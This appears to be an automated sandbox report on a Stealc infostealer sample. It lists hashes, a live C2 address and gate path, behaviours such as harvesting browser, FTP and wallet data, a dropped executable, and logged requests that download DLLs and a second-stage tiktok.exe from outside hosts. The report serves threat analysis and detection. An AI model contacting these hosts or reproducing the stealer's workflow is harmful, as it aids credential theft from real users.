Overview

overview

10

Static

static

3

winprofile

windows7-x64

10

winprofile

windows10-1703-x64

10

Analysis

  • max time kernel
    192s
  • max time network
    297s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    07/06/2024, 00:38 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    9a3f94d8853f20963184f34cf75ecc08678ff43ec7ba524e54c1825d42d9f7d7.exe

  • Size

    249KB

  • MD5

    89ef597ad4066073fc1adfdd7e2487e8

  • SHA1

    053d0deee8a5a4ed5bac4e0e7a643ddbeee94084

  • SHA256

    9a3f94d8853f20963184f34cf75ecc08678ff43ec7ba524e54c1825d42d9f7d7

  • SHA512

    f48aaced3771f780e145d20e977b4aa8d2be8227c52a6b7f2e65b126d806d7ba619288572fc381ab38077081ba48f501b2b4a9e85e34f109d7a454f5b74ca78c

  • SSDEEP

    3072:ZiNo04Zd5/Dj53rOxGMWw2jzr5K+LWorYHLWorYO/IYE:ZijifnspWTfPL10HL10QE

Score
10/10
stealcdefault12discoveryspywarestealer

Malware Config

Extracted

Family

stealc

Botnet

default12

C2

http://185.172.128.170

Attributes
  • url_path

    /7043a0c6a68d9c65.php

Signatures

  • Stealc

    Stealc is an infostealer written in C++.

    stealerstealc
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

    spywarestealer
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\9a3f94d8853f20963184f34cf75ecc08678ff43ec7ba524e54c1825d42d9f7d7.exe
    "C:\Users\Admin\AppData\Local\Temp\9a3f94d8853f20963184f34cf75ecc08678ff43ec7ba524e54c1825d42d9f7d7.exe"
    1⤵
    • Loads dropped DLL
    • Checks processor information in registry
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1468
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\BFHJECAAAF.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4220
      • C:\Users\Admin\AppData\Local\Temp\BFHJECAAAF.exe
        "C:\Users\Admin\AppData\Local\Temp\BFHJECAAAF.exe"
        3⤵
        • Executes dropped EXE
        PID:304

Network

  • flag-de
    POST
    http://185.172.128.170/7043a0c6a68d9c65.php
    9a3f94d8853f20963184f34cf75ecc08678ff43ec7ba524e54c1825d42d9f7d7.exe
    Remote address:
    185.172.128.170:80
    Request
    POST /7043a0c6a68d9c65.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----DBFHDHJKKJDHJJJJKEGH
    Host: 185.172.128.170
    Content-Length: 216
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Fri, 07 Jun 2024 00:39:03 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Vary: Accept-Encoding
    Content-Length: 156
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • flag-de
    POST
    http://185.172.128.170/7043a0c6a68d9c65.php
    9a3f94d8853f20963184f34cf75ecc08678ff43ec7ba524e54c1825d42d9f7d7.exe
    Remote address:
    185.172.128.170:80
    Request
    POST /7043a0c6a68d9c65.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----AKEGHIJJEHJDGCBFHCGI
    Host: 185.172.128.170
    Content-Length: 268
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Fri, 07 Jun 2024 00:39:03 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Vary: Accept-Encoding
    Content-Length: 1520
    Keep-Alive: timeout=5, max=99
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • flag-de
    POST
    http://185.172.128.170/7043a0c6a68d9c65.php
    9a3f94d8853f20963184f34cf75ecc08678ff43ec7ba524e54c1825d42d9f7d7.exe
    Remote address:
    185.172.128.170:80
    Request
    POST /7043a0c6a68d9c65.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----AFCFHJJECAEHJJKEHIDB
    Host: 185.172.128.170
    Content-Length: 267
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Fri, 07 Jun 2024 00:39:03 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Vary: Accept-Encoding
    Content-Length: 5416
    Keep-Alive: timeout=5, max=98
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • flag-de
    POST
    http://185.172.128.170/7043a0c6a68d9c65.php
    9a3f94d8853f20963184f34cf75ecc08678ff43ec7ba524e54c1825d42d9f7d7.exe
    Remote address:
    185.172.128.170:80
    Request
    POST /7043a0c6a68d9c65.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----JJECGCBGDBKJJKEBFBFH
    Host: 185.172.128.170
    Content-Length: 4207
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Fri, 07 Jun 2024 00:39:03 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Length: 0
    Keep-Alive: timeout=5, max=97
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • flag-de
    GET
    http://185.172.128.170/8420e83ceb95f3af/sqlite3.dll
    9a3f94d8853f20963184f34cf75ecc08678ff43ec7ba524e54c1825d42d9f7d7.exe
    Remote address:
    185.172.128.170:80
    Request
    GET /8420e83ceb95f3af/sqlite3.dll HTTP/1.1
    Host: 185.172.128.170
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Fri, 07 Jun 2024 00:39:04 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Last-Modified: Mon, 05 Sep 2022 14:30:30 GMT
    ETag: "10e436-5e7eeebed8d80"
    Accept-Ranges: bytes
    Content-Length: 1106998
    Content-Type: application/x-msdos-program
  • flag-de
    POST
    http://185.172.128.170/7043a0c6a68d9c65.php
    9a3f94d8853f20963184f34cf75ecc08678ff43ec7ba524e54c1825d42d9f7d7.exe
    Remote address:
    185.172.128.170:80
    Request
    POST /7043a0c6a68d9c65.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----KEHDBAEGIIIEBGCAAFHI
    Host: 185.172.128.170
    Content-Length: 359
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Fri, 07 Jun 2024 00:39:04 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Length: 0
    Keep-Alive: timeout=5, max=95
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • flag-de
    GET
    http://185.172.128.170/8420e83ceb95f3af/freebl3.dll
    9a3f94d8853f20963184f34cf75ecc08678ff43ec7ba524e54c1825d42d9f7d7.exe
    Remote address:
    185.172.128.170:80
    Request
    GET /8420e83ceb95f3af/freebl3.dll HTTP/1.1
    Host: 185.172.128.170
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Fri, 07 Jun 2024 00:39:04 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
    ETag: "a7550-5e7ebd4425100"
    Accept-Ranges: bytes
    Content-Length: 685392
    Content-Type: application/x-msdos-program
  • flag-de
    GET
    http://185.172.128.170/8420e83ceb95f3af/mozglue.dll
    9a3f94d8853f20963184f34cf75ecc08678ff43ec7ba524e54c1825d42d9f7d7.exe
    Remote address:
    185.172.128.170:80
    Request
    GET /8420e83ceb95f3af/mozglue.dll HTTP/1.1
    Host: 185.172.128.170
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Fri, 07 Jun 2024 00:39:05 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
    ETag: "94750-5e7ebd4425100"
    Accept-Ranges: bytes
    Content-Length: 608080
    Content-Type: application/x-msdos-program
  • flag-de
    GET
    http://185.172.128.170/8420e83ceb95f3af/msvcp140.dll
    9a3f94d8853f20963184f34cf75ecc08678ff43ec7ba524e54c1825d42d9f7d7.exe
    Remote address:
    185.172.128.170:80
    Request
    GET /8420e83ceb95f3af/msvcp140.dll HTTP/1.1
    Host: 185.172.128.170
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Fri, 07 Jun 2024 00:39:05 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
    ETag: "6dde8-5e7ebd4425100"
    Accept-Ranges: bytes
    Content-Length: 450024
    Content-Type: application/x-msdos-program
  • flag-de
    GET
    http://185.172.128.170/8420e83ceb95f3af/nss3.dll
    9a3f94d8853f20963184f34cf75ecc08678ff43ec7ba524e54c1825d42d9f7d7.exe
    Remote address:
    185.172.128.170:80
    Request
    GET /8420e83ceb95f3af/nss3.dll HTTP/1.1
    Host: 185.172.128.170
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Fri, 07 Jun 2024 00:39:05 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
    ETag: "1f3950-5e7ebd4425100"
    Accept-Ranges: bytes
    Content-Length: 2046288
    Content-Type: application/x-msdos-program
  • flag-us
    DNS
    170.128.172.185.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    170.128.172.185.in-addr.arpa
    IN PTR
    Response
  • flag-de
    GET
    http://185.172.128.159/tiktok.exe
    9a3f94d8853f20963184f34cf75ecc08678ff43ec7ba524e54c1825d42d9f7d7.exe
    Remote address:
    185.172.128.159:80
    Request
    GET /tiktok.exe HTTP/1.1
    Host: 185.172.128.159
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Fri, 07 Jun 2024 00:39:19 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Last-Modified: Wed, 24 Apr 2024 21:15:46 GMT
    ETag: "85400-616de2c892480"
    Accept-Ranges: bytes
    Content-Length: 545792
    Content-Type: application/x-msdos-program
  • flag-us
    DNS
    159.128.172.185.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    159.128.172.185.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    13.227.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    13.227.111.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    174.117.168.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    174.117.168.52.in-addr.arpa
    IN PTR
    Response
  • 185.172.128.170:80
    http://185.172.128.170/8420e83ceb95f3af/nss3.dll
    http
    9a3f94d8853f20963184f34cf75ecc08678ff43ec7ba524e54c1825d42d9f7d7.exe
    2.0MB
     3.8MB
     4250
    3809

    HTTP Request

    POST http://185.172.128.170/7043a0c6a68d9c65.php

    HTTP Response

    200

    HTTP Request

    POST http://185.172.128.170/7043a0c6a68d9c65.php

    HTTP Response

    200

    HTTP Request

    POST http://185.172.128.170/7043a0c6a68d9c65.php

    HTTP Response

    200

    HTTP Request

    POST http://185.172.128.170/7043a0c6a68d9c65.php

    HTTP Response

    200

    HTTP Request

    GET http://185.172.128.170/8420e83ceb95f3af/sqlite3.dll

    HTTP Response

    200

    HTTP Request

    POST http://185.172.128.170/7043a0c6a68d9c65.php

    HTTP Response

    200

    HTTP Request

    GET http://185.172.128.170/8420e83ceb95f3af/freebl3.dll

    HTTP Response

    200

    HTTP Request

    GET http://185.172.128.170/8420e83ceb95f3af/mozglue.dll

    HTTP Response

    200

    HTTP Request

    GET http://185.172.128.170/8420e83ceb95f3af/msvcp140.dll

    HTTP Response

    200

    HTTP Request

    GET http://185.172.128.170/8420e83ceb95f3af/nss3.dll

    HTTP Response

    200
  • 185.172.128.159:80
    http://185.172.128.159/tiktok.exe
    http
    9a3f94d8853f20963184f34cf75ecc08678ff43ec7ba524e54c1825d42d9f7d7.exe
    20.5kB
     563.0kB
     426
    424

    HTTP Request

    GET http://185.172.128.159/tiktok.exe

    HTTP Response

    200
  • 8.8.8.8:53
    170.128.172.185.in-addr.arpa
    dns
    74 B
     74 B
     1
    1

    DNS Request

    170.128.172.185.in-addr.arpa

  • 8.8.8.8:53
    159.128.172.185.in-addr.arpa
    dns
    74 B
     74 B
     1
    1

    DNS Request

    159.128.172.185.in-addr.arpa

  • 8.8.8.8:53
    13.227.111.52.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    13.227.111.52.in-addr.arpa

  • 8.8.8.8:53
    174.117.168.52.in-addr.arpa
    dns
    73 B
     147 B
     1
    1

    DNS Request

    174.117.168.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\Are.docx
    Filesize

    11KB

    MD5

    a33e5b189842c5867f46566bdbf7a095

    SHA1

    e1c06359f6a76da90d19e8fd95e79c832edb3196

    SHA256

    5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454

    SHA512

    f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\BFHJECAAAF.exe
    Filesize

    533KB

    MD5

    6c93fc68e2f01c20fb81af24470b790c

    SHA1

    d5927b38a32e30afcf5a658612a8266476fc4ad8

    SHA256

    64a71b664d76641b35dac312161cb356b3b3b5f0b45c9d88c8afa547b4902580

    SHA512

    355e9677121ef17cf8c398f0c17399776d206c62014080a2c62682e1152ea0729dcc6e233358dcd6bae009b07e3db936d4b18eb37d6e7ebc2fe9cf8d827c4ade

    Download Submit

  • \ProgramData\mozglue.dll
    Filesize

    593KB

    MD5

    c8fd9be83bc728cc04beffafc2907fe9

    SHA1

    95ab9f701e0024cedfbd312bcfe4e726744c4f2e

    SHA256

    ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

    SHA512

    fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

    Download Submit

  • \ProgramData\nss3.dll
    Filesize

    2.0MB

    MD5

    1cc453cdf74f31e4d913ff9c10acdde2

    SHA1

    6e85eae544d6e965f15fa5c39700fa7202f3aafe

    SHA256

    ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

    SHA512

    dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

    Download Submit

  • memory/1468-2-0x0000000001D10000-0x0000000001D37000-memory.dmp

    Filesize

    156KB

    Download

  • memory/1468-3-0x0000000000400000-0x000000000063B000-memory.dmp

    Filesize

    2.2MB

    Download

  • memory/1468-1-0x0000000001DA0000-0x0000000001EA0000-memory.dmp

    Filesize

    1024KB

    Download

  • memory/1468-4-0x0000000061E00000-0x0000000061EF3000-memory.dmp

    Filesize

    972KB

    Download

  • memory/1468-71-0x0000000000400000-0x0000000001BB8000-memory.dmp

    Filesize

    23.7MB

    Download

  • memory/1468-80-0x0000000000400000-0x000000000063B000-memory.dmp

    Filesize

    2.2MB

    Download

  • memory/1468-79-0x0000000000400000-0x0000000001BB8000-memory.dmp

    Filesize

    23.7MB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.